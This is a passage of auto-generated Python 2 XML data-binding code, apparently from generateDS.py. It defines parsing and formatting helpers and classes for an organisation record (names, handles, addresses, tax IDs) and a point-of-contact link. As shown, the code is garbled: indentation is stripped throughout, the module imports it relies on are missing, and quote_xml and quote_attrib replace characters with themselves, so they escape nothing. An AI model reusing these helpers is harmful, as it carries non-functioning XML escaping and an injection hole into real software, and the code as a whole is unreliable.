Verbose_import_ = False
(
XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
# cElementTree from Python 2.5+
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
# ElementTree from Python 2.5+
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
# normal ElementTree install
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError(
"Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
kwargs['parser'] = etree_.ETCompatXMLParser()
doc = etree_.parse(*args, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return '%f' % input_data
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return input_data
def gds_validate_datetime(self, input_data, node, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
except AttributeError:
pass
return _svalue
@classmethod
def gds_parse_date(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
dt = dt.replace(tzinfo=tz)
return dt.date()
def gds_validate_time(self, input_data, node, input_name=''):
return input_data
def gds_format_time(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%02d:%02d:%02d' % (
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%02d:%02d:%02d.%s' % (
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_time(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt.time()
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.iteritems()))
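# Editor's aside (illustrative, not generated output): the gds_format_* /
# gds_parse_* helpers above round-trip XML Schema lexical forms, e.g. an
# offset-aware datetime formats to a string like "2013-08-06T14:52:51-04:00"
# and gds_parse_datetime turns that text back into a datetime object.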
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'ascii'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
if pretty_print:
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (
msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace, pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(outfile, level, namespace, name, pretty_print)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name, base64.b64encode(self.value), self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class org(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, city=None, iso3166_1=None, dbaName=None, pocLinks=None, handle=None, orgName=None, orgUrl=None, postalCode=None, comment=None, registrationDate=None, iso3166_2=None, streetAddress=None, taxId=None, anytypeobjs_=None):
if city is None:
self.city = []
else:
self.city = city
if iso3166_1 is None:
self.iso3166_1 = []
else:
self.iso3166_1 = iso3166_1
if dbaName is None:
self.dbaName = []
else:
self.dbaName = dbaName
if pocLinks is None:
self.pocLinks = []
else:
self.pocLinks = pocLinks
if handle is None:
self.handle = []
else:
self.handle = handle
if orgName is None:
self.orgName = []
else:
self.orgName = orgName
if orgUrl is None:
self.orgUrl = []
else:
self.orgUrl = orgUrl
if postalCode is None:
self.postalCode = []
else:
self.postalCode = postalCode
if comment is None:
self.comment = []
else:
self.comment = comment
if registrationDate is None:
self.registrationDate = []
else:
self.registrationDate = registrationDate
if iso3166_2 is None:
self.iso3166_2 = []
else:
self.iso3166_2 = iso3166_2
if streetAddress is None:
self.streetAddress = []
else:
self.streetAddress = streetAddress
if taxId is None:
self.taxId = []
else:
self.taxId = taxId
self.anytypeobjs_ = anytypeobjs_
def factory(*args_, **kwargs_):
if org.subclass:
return org.subclass(*args_, **kwargs_)
else:
return org(*args_, **kwargs_)
factory = staticmethod(factory)
def get_city(self): return self.city
def set_city(self, city): self.city = city
def add_city(self, value): self.city.append(value)
def insert_city(self, index, value): self.city[index] = value
def get_iso3166_1(self): return self.iso3166_1
def set_iso3166_1(self, iso3166_1): self.iso3166_1 = iso3166_1
def add_iso3166_1(self, value): self.iso3166_1.append(value)
def insert_iso3166_1(self, index, value): self.iso3166_1[index] = value
def get_dbaName(self): return self.dbaName
def set_dbaName(self, dbaName): self.dbaName = dbaName
def add_dbaName(self, value): self.dbaName.append(value)
def insert_dbaName(self, index, value): self.dbaName[index] = value
def get_pocLinks(self): return self.pocLinks
def set_pocLinks(self, pocLinks): self.pocLinks = pocLinks
def add_pocLinks(self, value): self.pocLinks.append(value)
def insert_pocLinks(self, index, value): self.pocLinks[index] = value
def get_handle(self): return self.handle
def set_handle(self, handle): self.handle = handle
def add_handle(self, value): self.handle.append(value)
def insert_handle(self, index, value): self.handle[index] = value
def get_orgName(self): return self.orgName
def set_orgName(self, orgName): self.orgName = orgName
def add_orgName(self, value): self.orgName.append(value)
def insert_orgName(self, index, value): self.orgName[index] = value
def get_orgUrl(self): return self.orgUrl
def set_orgUrl(self, orgUrl): self.orgUrl = orgUrl
def add_orgUrl(self, value): self.orgUrl.append(value)
def insert_orgUrl(self, index, value): self.orgUrl[index] = value
def get_postalCode(self): return self.postalCode
def set_postalCode(self, postalCode): self.postalCode = postalCode
def add_postalCode(self, value): self.postalCode.append(value)
def insert_postalCode(self, index, value): self.postalCode[index] = value
def get_comment(self): return self.comment
def set_comment(self, comment): self.comment = comment
def add_comment(self, value): self.comment.append(value)
def insert_comment(self, index, value): self.comment[index] = value
def get_registrationDate(self): return self.registrationDate
def set_registrationDate(self, registrationDate): self.registrationDate = registrationDate
def add_registrationDate(self, value): self.registrationDate.append(value)
def insert_registrationDate(self, index, value): self.registrationDate[index] = value
def get_iso3166_2(self): return self.iso3166_2
def set_iso3166_2(self, iso3166_2): self.iso3166_2 = iso3166_2
def add_iso3166_2(self, value): self.iso3166_2.append(value)
def insert_iso3166_2(self, index, value): self.iso3166_2[index] = value
def get_streetAddress(self): return self.streetAddress
def set_streetAddress(self, streetAddress): self.streetAddress = streetAddress
def add_streetAddress(self, value): self.streetAddress.append(value)
def insert_streetAddress(self, index, value): self.streetAddress[index] = value
def get_taxId(self): return self.taxId
def set_taxId(self, taxId): self.taxId = taxId
def add_taxId(self, value): self.taxId.append(value)
def insert_taxId(self, index, value): self.taxId[index] = value
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def hasContent_(self):
if (
self.city or
self.iso3166_1 or
self.dbaName or
self.pocLinks or
self.handle or
self.orgName or
self.orgUrl or
self.postalCode or
self.comment or
self.registrationDate or
self.iso3166_2 or
self.streetAddress or
self.taxId or
self.anytypeobjs_ is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='org', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='org')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='org'):
pass
def exportChildren(self, outfile, level, namespace_='v1:', name_='org', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for city_ in self.city:
showIndent(outfile, level, pretty_print)
outfile.write('<%scity>%s</%scity>%s' % (namespace_, self.gds_format_string(quote_xml(city_).encode(ExternalEncoding), input_name='city'), namespace_, eol_))
for iso3166_1_ in self.iso3166_1:
iso3166_1_.export(outfile, level, namespace_, name_='iso3166-1', pretty_print=pretty_print)
for dbaName_ in self.dbaName:
showIndent(outfile, level, pretty_print)
outfile.write('<%sdbaName>%s</%sdbaName>%s' % (namespace_, self.gds_format_string(quote_xml(dbaName_).encode(ExternalEncoding), input_name='dbaName'), namespace_, eol_))
for pocLinks_ in self.pocLinks:
pocLinks_.export(outfile, level, namespace_, name_='pocLinks', pretty_print=pretty_print)
for handle_ in self.handle:
showIndent(outfile, level, pretty_print)
outfile.write('<%shandle>%s</%shandle>%s' % (namespace_, self.gds_format_string(quote_xml(handle_).encode(ExternalEncoding), input_name='handle'), namespace_, eol_))
for orgName_ in self.orgName:
showIndent(outfile, level, pretty_print)
outfile.write('<%sorgName>%s</%sorgName>%s' % (namespace_, self.gds_format_string(quote_xml(orgName_).encode(ExternalEncoding), input_name='orgName'), namespace_, eol_))
for orgUrl_ in self.orgUrl:
showIndent(outfile, level, pretty_print)
outfile.write('<%sorgUrl>%s</%sorgUrl>%s' % (namespace_, self.gds_format_string(quote_xml(orgUrl_).encode(ExternalEncoding), input_name='orgUrl'), namespace_, eol_))
for postalCode_ in self.postalCode:
showIndent(outfile, level, pretty_print)
outfile.write('<%spostalCode>%s</%spostalCode>%s' % (namespace_, self.gds_format_string(quote_xml(postalCode_).encode(ExternalEncoding), input_name='postalCode'), namespace_, eol_))
for comment_ in self.comment:
comment_.export(outfile, level, namespace_, name_='comment', pretty_print=pretty_print)
for registrationDate_ in self.registrationDate:
showIndent(outfile, level, pretty_print)
outfile.write('<%sregistrationDate>%s</%sregistrationDate>%s' % (namespace_, self.gds_format_string(quote_xml(registrationDate_).encode(ExternalEncoding), input_name='registrationDate'), namespace_, eol_))
for iso3166_2_ in self.iso3166_2:
showIndent(outfile, level, pretty_print)
outfile.write('<%siso3166-2>%s</%siso3166-2>%s' % (namespace_, self.gds_format_string(quote_xml(iso3166_2_).encode(ExternalEncoding), input_name='iso3166-2'), namespace_, eol_))
for streetAddress_ in self.streetAddress:
streetAddress_.export(outfile, level, namespace_, name_='streetAddress', pretty_print=pretty_print)
for taxId_ in self.taxId:
showIndent(outfile, level, pretty_print)
outfile.write('<%staxId>%s</%staxId>%s' % (namespace_, self.gds_format_string(quote_xml(taxId_).encode(ExternalEncoding), input_name='taxId'), namespace_, eol_))
if self.anytypeobjs_ is not None:
self.anytypeobjs_.export(outfile, level, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='org'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('city=[\n')
level += 1
for city_ in self.city:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(city_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('iso3166_1=[\n')
level += 1
for iso3166_1_ in self.iso3166_1:
showIndent(outfile, level)
outfile.write('model_.iso3166_1(\n')
iso3166_1_.exportLiteral(outfile, level, name_='iso3166-1')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('dbaName=[\n')
level += 1
for dbaName_ in self.dbaName:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(dbaName_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('pocLinks=[\n')
level += 1
for pocLinks_ in self.pocLinks:
showIndent(outfile, level)
outfile.write('model_.pocLinks(\n')
pocLinks_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('handle=[\n')
level += 1
for handle_ in self.handle:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(handle_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('orgName=[\n')
level += 1
for orgName_ in self.orgName:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(orgName_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('orgUrl=[\n')
level += 1
for orgUrl_ in self.orgUrl:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(orgUrl_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('postalCode=[\n')
level += 1
for postalCode_ in self.postalCode:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(postalCode_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('comment=[\n')
level += 1
for comment_ in self.comment:
showIndent(outfile, level)
outfile.write('model_.comment(\n')
comment_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('registrationDate=[\n')
level += 1
for registrationDate_ in self.registrationDate:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(registrationDate_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('iso3166_2=[\n')
level += 1
for iso3166_2_ in self.iso3166_2:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(iso3166_2_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('streetAddress=[\n')
level += 1
for streetAddress_ in self.streetAddress:
showIndent(outfile, level)
outfile.write('model_.streetAddress(\n')
streetAddress_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('taxId=[\n')
level += 1
for taxId_ in self.taxId:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(taxId_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
if self.anytypeobjs_ is not None:
showIndent(outfile, level)
outfile.write('anytypeobjs_=model_.anytypeobjs_(\n')
self.anytypeobjs_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'city':
city_ = child_.text
city_ = self.gds_validate_string(city_, node, 'city')
self.city.append(city_)
elif nodeName_ == 'iso3166-1':
obj_ = iso3166_1.factory()
obj_.build(child_)
self.iso3166_1.append(obj_)
elif nodeName_ == 'dbaName':
dbaName_ = child_.text
dbaName_ = self.gds_validate_string(dbaName_, node, 'dbaName')
self.dbaName.append(dbaName_)
elif nodeName_ == 'pocLinks':
obj_ = pocLinks.factory()
obj_.build(child_)
self.pocLinks.append(obj_)
elif nodeName_ == 'handle':
handle_ = child_.text
handle_ = self.gds_validate_string(handle_, node, 'handle')
self.handle.append(handle_)
elif nodeName_ == 'orgName':
orgName_ = child_.text
orgName_ = self.gds_validate_string(orgName_, node, 'orgName')
self.orgName.append(orgName_)
elif nodeName_ == 'orgUrl':
orgUrl_ = child_.text
orgUrl_ = self.gds_validate_string(orgUrl_, node, 'orgUrl')
self.orgUrl.append(orgUrl_)
elif nodeName_ == 'postalCode':
postalCode_ = child_.text
postalCode_ = self.gds_validate_string(postalCode_, node, 'postalCode')
self.postalCode.append(postalCode_)
elif nodeName_ == 'comment':
obj_ = comment.factory()
obj_.build(child_)
self.comment.append(obj_)
elif nodeName_ == 'registrationDate':
registrationDate_ = child_.text
registrationDate_ = self.gds_validate_string(registrationDate_, node, 'registrationDate')
self.registrationDate.append(registrationDate_)
elif nodeName_ == 'iso3166-2':
iso3166_2_ = child_.text
iso3166_2_ = self.gds_validate_string(iso3166_2_, node, 'iso3166_2')
self.iso3166_2.append(iso3166_2_)
elif nodeName_ == 'streetAddress':
obj_ = streetAddress.factory()
obj_.build(child_)
self.streetAddress.append(obj_)
elif nodeName_ == 'taxId':
taxId_ = child_.text
taxId_ = self.gds_validate_string(taxId_, node, 'taxId')
self.taxId.append(taxId_)
else:
obj_ = self.gds_build_any(child_, 'org')
if obj_ is not None:
self.set_anytypeobjs_(obj_)
# end class org
class pocLinkRef(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, function=None, handle=None, description=None):
self.function = _cast(None, function)
self.handle = _cast(None, handle)
self.description = _cast(None, description)
pass
def factory(*args_, **kwargs_):
if pocLinkRef.subclass:
return pocLinkRef.subclass(*args_, **kwargs_)
else:
return pocLinkRef(*args_, **kwargs_)
factory = staticmethod(factory)
def get_function(self): return self.function
def set_function(self, function): self.function = function
def get_handle(self): return self.handle
def set_handle(self, handle): self.handle = handle
def get_description(self): return self.description
def set_description(self, description): self.description = description
    def hasContent_(self):
        # pocLinkRef carries attributes only, so it never has element content.
        return False
